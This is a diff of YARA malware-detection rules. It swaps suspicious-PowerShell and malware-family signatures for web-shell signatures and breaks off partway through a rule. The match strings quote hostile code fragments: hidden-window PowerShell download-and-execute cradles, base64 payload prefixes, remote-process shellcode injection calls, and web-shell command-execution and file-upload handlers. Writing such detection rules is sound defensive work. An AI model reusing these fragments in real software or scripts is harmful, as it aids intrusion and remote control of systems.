-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L52-L91"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2312-L2337"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "56ad9c71c34956e94325452d829627a30b1499552725232a07100f05a050ef1b"
-		score = 60
+		logic_hash = "04a58352202538d5446f1000c07341ea70434f00403f116233f335213687636e"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		nodeepdive = 1
+		super_rule = 1
+		hash0 = "ef43fef943e9df90ddb6257950b3538f"
+		hash1 = "ae025c886fbe7f9ed159f49593674832"
+		hash2 = "911195a9b7c010f61b66439d9048f400"
+		hash3 = "697dae78c040150daff7db751fc0c03c"
+		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash8 = "41af6fd253648885c7ad2ed524e0692d"
+		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s1 = "System.Net.WebClient).DownloadString(\"http" ascii nocase
-		$s2 = "System.Net.WebClient).DownloadString('http" ascii nocase
-		$s3 = "system.net.webclient).downloadfile('http" ascii nocase
-		$s4 = "system.net.webclient).downloadfile(\"http" ascii nocase
-		$s5 = "GetString([Convert]::FromBase64String(" ascii nocase
-		$fp1 = "NuGet.exe" ascii fullword
-		$fp2 = "chocolatey.org" ascii
-		$fp3 = " GET /"
-		$fp4 = " POST /"
-		$fp5 = ".DownloadFile('https://aka.ms/installazurecliwindows', 'AzureCLI.msi')" ascii
-		$fp6 = " 404 "
-		$fp7 = "# RemoteSSHConfigurationScript" ascii
-		$fp8 = "<helpItems" ascii fullword
-		$fp9 = "DownloadFile(\"https://codecov.io/bash" ascii
-		$fp10 = "DownloadFile('https://get.golang.org/installer.exe" ascii
-		$fpg1 = "All Rights"
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg4 = "Copyright"
-		$fpg5 = "License"
-		$fpg6 = "<?xml"
-		$fpg7 = "Help" fullword
-		$fpg8 = "COPYRIGHT" fullword
+		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
 
 	condition:
-		1 of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_Powershell_In_Word_Doc : FILE
+rule SIGNATURE_BASE_Webshell_807_A_Css_Dm_He1P_Jspspy_Xxx
 {
 	meta:
-		description = "Detects a powershell and bypass keyword in a Word document"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c9d073ff-25c6-5751-92bf-e22ae7cfd5f5"
-		date = "2017-06-27"
-		modified = "2024-04-03"
-		reference = "Internal Research - ME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L104-L119"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2338-L2376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6a9b295f1c430c285aedc5e6df268ea2023c8bdaccd04cf8a5d021419cd6bd64"
-		score = 50
-		quality = 83
-		tags = "FILE"
+		logic_hash = "eb045425a9f519dd7bf028a7795b16b89768682f5850b6a4d45f0991bfeb6431"
+		score = 70
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905"
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash5 = "d71716df5042880ef84427acee8b121e"
+		hash6 = "341298482cf90febebb8616426080d1d"
+		hash7 = "29aebe333d6332f0ebc2258def94d57e"
+		hash8 = "42654af68e5d4ea217e6ece5389eb302"
+		hash9 = "88fc87e7c58249a398efd5ceae636073"
+		hash10 = "4a812678308475c64132a9b56254edbc"
+		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash12 = "344f9073576a066142b2023629539ebd"
+		hash13 = "32dea47d9c13f9000c4c807561341bee"
+		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash15 = "6acc82544be056580c3a1caaa4999956"
+		hash16 = "6aa32a6392840e161a018f3907a86968"
+		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash18 = "3ea688e3439a1f56b16694667938316d"
+		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash20 = "71097537a91fac6b01f46f66ee2d7749"
+		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "POwErSHELl.ExE" fullword ascii nocase
-		$s2 = "BYPASS" fullword ascii nocase
+		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
+		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Susp_Powershell_Sep17_1 : FILE
+rule SIGNATURE_BASE_Webshell_201_3_Ma_Download
 {
 	meta:
-		description = "Detects suspicious PowerShell script in combo with VBS or JS "
+		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d4b9113-173f-5c12-b440-7f1cef9e6ebb"
-		date = "2017-09-30"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L131-L148"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2377-L2396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c8a1e72b2c4685a5a5749d86901b123976092aee373412bf04c62aa32145be8"
-		score = 60
+		logic_hash = "14eccd07e7bef9d570f75fc4adc204d175dcfbb5b950bdb3e25a65d3c5bb0310"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e28521749165d2d48bfa1eac685c985ac15fc9ca5df177d4efadf9089395c56"
+		super_rule = 1
+		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$x1 = "Process.Create(\"powershell.exe -nop -w hidden" fullword ascii nocase
-		$x2 = ".Run\"powershell.exe -nop -w hidden -c \"\"IEX " ascii
-		$s1 = "window.resizeTo 0,0" fullword ascii
+		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
 
 	condition:
-		( filesize < 2KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Susp_Powershell_Sep17_2 : FILE
+rule SIGNATURE_BASE_Webshell_Browser_201_3_400_In_Jfolder_Jfolder01_Jsp_Leo_Ma_Warn_Webshell_Nc_Download
 {
 	meta:
-		description = "Detects suspicious PowerShell script in combo with VBS or JS "
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e44d1dfc-0858-5248-a57f-efb5c647f4cc"
-		date = "2017-09-30"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L150-L170"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2397-L2424"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0819f57afb6d1d878e4db4079bfd43ccac520829c877de04d16d8bd048a35ab5"
-		score = 65
+		logic_hash = "0bf0fd37b542c9362a47180ee03ea28995b48d483f72273e472292a320a3ddee"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "36331f2c81bad763528d0ae00edf55be"
+		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash5 = "8979594423b68489024447474d113894"
+		hash6 = "ec482fc969d182e5440521c913bab9bd"
+		hash7 = "f98d2b33cd777e160d1489afed96de39"
+		hash8 = "4b4c12b3002fad88ca6346a873855209"
+		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash10 = "e9a5280f77537e23da2545306f6a19ad"
+		hash11 = "598eef7544935cf2139d1eada4375bb5"
+		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$x1 = ".Run \"powershell.exe -nop -w hidden -e " ascii
-		$x2 = "FileExists(path + \"\\..\\powershell.exe\")" fullword ascii
-		$x3 = "window.moveTo -4000, -4000" fullword ascii
-		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
 
 	condition:
-		filesize < 20KB and ( ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Wscript_Shell_Powershell_Combo : FILE
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "265ec471-d9ed-5cb6-a32b-cfa62fccdf64"
-		date = "2018-02-07"
-		modified = "2024-04-03"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L172-L193"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2425-L2442"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0ab5808593c999c1ce342051a8e292153aa20516cf48071565d677399adfb160"
-		score = 50
+		logic_hash = "bd9f1ffdbf94dd5a871fc7c3b31d2357e99265d02bfe1c836f82d251053dce7d"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
 
 	strings:
-		$s1 = ".CreateObject(\"WScript.Shell\")" ascii
-		$p1 = "powershell.exe" fullword ascii
-		$p2 = "-ExecutionPolicy Bypass" fullword ascii
-		$p3 = "[System.Convert]::FromBase64String(" ascii
-		$fp1 = "Copyright: Microsoft Corp." ascii
+		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
 
 	condition:
-		filesize < 400KB and $s1 and 1 of ( $p* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Powershell_String_K32_Remprocess : FILE
+rule SIGNATURE_BASE_Webshell_In_Jfolder_Jfolder01_Jsp_Leo_Warn
 {
 	meta:
-		description = "Detects suspicious PowerShell code that uses Kernel32, RemoteProccess handles or shellcode"
+		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad646e19-b132-5594-bea2-d74e96c06ebb"
-		date = "2018-03-31"
-		modified = "2024-04-03"
-		reference = "https://github.com/nccgroup/redsnarf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L195-L215"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2443-L2463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03c80de8e59e640709c4ee1912dc47c398e265f9b88845a6de88031e2eb46ba3"
-		score = 65
+		logic_hash = "00c3667438a688b990cf1c8bb6db52be7c6d1b36192dece4e8b07edda68f4b72"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash3 = "54a8dd78ec4798cf034c7765d8b2adfada59ac34d019e77af36dcaed1db18912"
-		hash4 = "6d52cdd74edea68d55c596554f47eefee1efc213c5820d86e64de0853a4e46b3"
+		super_rule = 1
+		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash1 = "8979594423b68489024447474d113894"
+		hash2 = "ec482fc969d182e5440521c913bab9bd"
+		hash3 = "f98d2b33cd777e160d1489afed96de39"
+		hash4 = "4b4c12b3002fad88ca6346a873855209"
+		hash5 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii
-		$x2 = "$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")" fullword ascii
-		$s3 = "$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants." ascii
-		$s7 = "if ($RemoteProcHandle -eq [IntPtr]::Zero)" fullword ascii
-		$s8 = "if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))" fullword ascii
-		$s9 = "$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, " ascii
-		$s15 = "$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null" fullword ascii
+		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 6000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Powershell_JAB_B64 : FILE
+rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1_Ma4_2
 {
 	meta:
-		description = "Detects base464 encoded $ sign at the beginning of a string"
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c18fa17b-aaa5-5a89-bc25-3cc51b5af103"
-		date = "2018-04-02"
-		modified = "2024-04-03"
-		reference = "https://twitter.com/ItsReallyNick/status/980915287922040832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L217-L231"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2464-L2486"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4746a73774f945e63455ca7dd58ef67290f7c66d2dca80d06d52d2545c69a190"
-		score = 60
-		quality = 83
-		tags = "FILE"
+		logic_hash = "765efb4f776d9ffe5dab1b5decbb60df654e1de9ab8ae7e0437c5c8f717642b9"
+		score = 70
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s1 = "('JAB" ascii wide
-		$s2 = "powershell" nocase
+		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
+		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
 
 	condition:
-		filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_PS1_Frombase64String_Content_Indicator : FILE
+rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_PHPSPY
 {
 	meta:
-		description = "Detects suspicious base64 encoded PowerShell expressions"
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "326c83ff-5d21-508f-b935-03ccdab6efa7"
-		date = "2020-01-25"
-		modified = "2024-04-03"
-		reference = "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L233-L284"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2487-L2505"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a9ec7a00e9faee5cc081a2bc86abf8027fcd3cfe590cdd4f2f99425b6723f23f"
-		score = 65
-		quality = 83
-		tags = "FILE"
+		logic_hash = "80c8e7b50aea91284a25ffd3a07d8705c24b6a95a58f42ec6043ececcff32dbb"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$ = "::FromBase64String(\"H4s" ascii wide
-		$ = "::FromBase64String(\"TVq" ascii wide
-		$ = "::FromBase64String(\"UEs" ascii wide
-		$ = "::FromBase64String(\"JAB" ascii wide
-		$ = "::FromBase64String(\"SUVY" ascii wide
-		$ = "::FromBase64String(\"SQBFAF" ascii wide
-		$ = "::FromBase64String(\"SQBuAH" ascii wide
-		$ = "::FromBase64String(\"PAA" ascii wide
-		$ = "::FromBase64String(\"cwBhA" ascii wide
-		$ = "::FromBase64String(\"aWV4" ascii wide
-		$ = "::FromBase64String(\"aQBlA" ascii wide
-		$ = "::FromBase64String(\"R2V0" ascii wide
-		$ = "::FromBase64String(\"dmFy" ascii wide
-		$ = "::FromBase64String(\"dgBhA" ascii wide
-		$ = "::FromBase64String(\"dXNpbm" ascii wide
-		$ = "::FromBase64String(\"H4sIA" ascii wide
-		$ = "::FromBase64String(\"Y21k" ascii wide
-		$ = "::FromBase64String(\"Qzpc" ascii wide
-		$ = "::FromBase64String(\"Yzpc" ascii wide
-		$ = "::FromBase64String(\"IAB" ascii wide
-		$ = "::FromBase64String('H4s" ascii wide
-		$ = "::FromBase64String('TVq" ascii wide
-		$ = "::FromBase64String('UEs" ascii wide
-		$ = "::FromBase64String('JAB" ascii wide
-		$ = "::FromBase64String('SUVY" ascii wide
-		$ = "::FromBase64String('SQBFAF" ascii wide
-		$ = "::FromBase64String('SQBuAH" ascii wide
-		$ = "::FromBase64String('PAA" ascii wide
-		$ = "::FromBase64String('cwBhA" ascii wide
-		$ = "::FromBase64String('aWV4" ascii wide
-		$ = "::FromBase64String('aQBlA" ascii wide
-		$ = "::FromBase64String('R2V0" ascii wide
-		$ = "::FromBase64String('dmFy" ascii wide
-		$ = "::FromBase64String('dgBhA" ascii wide
-		$ = "::FromBase64String('dXNpbm" ascii wide
-		$ = "::FromBase64String('H4sIA" ascii wide
-		$ = "::FromBase64String('Y21k" ascii wide
-		$ = "::FromBase64String('Qzpc" ascii wide
-		$ = "::FromBase64String('Yzpc" ascii wide
-		$ = "::FromBase64String('IAB" ascii wide
+		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
 
 	condition:
-		filesize < 5000KB and 1 of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_Elise_Jan18_1 : FILE
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Detects Elise malware samples - fake Norton Security NavShExt.dll"
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8e4f4ec8-5d31-5990-8c14-861423571a79"
-		date = "2018-01-24"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/blu3_team/status/955971742329135105"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lotusblossom_elise.yar#L13-L32"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2506-L2523"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d43486db0d4263f91924da89f1922ad965ed91eadd07ae0705eecd371f31fa44"
-		score = 75
+		logic_hash = "228e0a73f14da2957f75ae898fdbcf2386deb366df6ddc312162ab723bac44ba"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6dc2a49d58dc568944fef8285ad7a03b772b9bdf1fe4bddff3f1ade3862eae79"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s1 = "NavShExt.dll" fullword wide
-		$s2 = "Norton Security" fullword wide
-		$a1 = "donotbotherme" fullword ascii
+		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( pe.imphash ( ) == "e9478ee4ebf085d1f14f64ba96ef082f" or ( 1 of ( $s* ) and $a1 ) )
+		all of them
 }
-rule SIGNATURE_BASE_Upatre_Hazgurut : FILE
+rule SIGNATURE_BASE_Webshell_C99_Shell_Ci_Biz_Was_Here_C100_V_Xxx
 {
 	meta:
-		description = "Detects Upatre malware - file hazgurut.exe"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0040452-ed63-5e90-9ed6-4f05e7b4eadc"
-		date = "2015-10-13"
-		modified = "2023-12-05"
-		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_upatre_oct15.yar#L8-L45"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2524-L2543"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "41dd2f615d1c75ef81073d26bfbdb4f5c6735d9a3ff6d543ca77d6e16fe7eb5b"
+		logic_hash = "ccc3cb553f7b5d089a43612d48522cc4a66b4a8ab433321ae1a716a8fa57b62c"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
-		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
-		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
-		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
-		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
-		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
-		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
-		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
-		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
-		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
-		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
-		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
-		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
